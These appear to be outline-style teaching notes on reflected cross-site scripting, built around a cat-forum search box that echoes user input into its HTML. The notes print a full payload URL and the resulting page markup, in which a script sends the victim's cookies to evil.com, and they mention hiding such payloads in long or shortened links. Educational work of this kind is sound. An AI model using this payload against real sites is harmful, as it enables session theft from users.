- Questions to be answered
- What is Reflected XSS (Cross-Site Scripting)?
- How does Reflected XSS compare to other types of XSS?
- What does a Reflected XSS payload look like?
- 80/20 Analysis
- Explore definition through example
- Scenario
- Website forum for cat lovers
- User just clicked on a link to show all cat photos on site
- Browser Request
- Server Response
<!-- Search form... --> <input id='search' type='text' value='cat-photos'> <button>Search</button> <!-- Search form... -->
- Problems?
- Alert: User submitted input is reflected into the response
- Reflected XSS
- “But wait, how is this untrusted?!”
- We’ll explore this soon
- Alert: User submitted input is reflected into the response
- Portion of Server-side Template
let searchParam = "cat-photos"; // Mock params from request let htmlPage = `<input id='search' type='text' value='${searchParam}'>`;
- Alert
- User input isn’t validated against a whitelist
- Using string concatenation with user input
- Url View with payload
http://cats.example.com?search='><script>document.location='http://evil.com/receiver?cookie='+document.cookie</script> - Server-side Template View
let htmlPage = `<input id='search' type='text' value='${searchParam}'>`;
- HTML View
<input id='search' type='text' value=''> <script>document.location='http://evil.com/receiver?cookie='+document.cookie</script>'>
<script>document.location='http://evil.com/receiver?cookie='+document.cookie</script>'>- Eval order
- document.cookie
- A string containing a semicolon-separated list of all cookies (i.e. key=value pairs)
- document.location
- Redirection logic
- evil.com can view submitted cookie string
- document.cookie
- Process recap
- A victim clicks on a link with the payload
- trusted.example.com/PAYLOAD_HERE
- The payload goes to trusted.example.com
- The payload is embedded in the response
- The payload is reflected back to the user
- Malicious javascript sends
trusted.example.com’s cookies toevil.example.com
- A victim clicks on a link with the payload
- Attack vectors
- Payload at the end of a long link
- When previewing a link, only first x characters are easily viewable
- Link shortener
- Payload at the end of a long link
- Persistent
- Stored XSS
- Non-Persistent
- Reflected XSS
- DOM XSS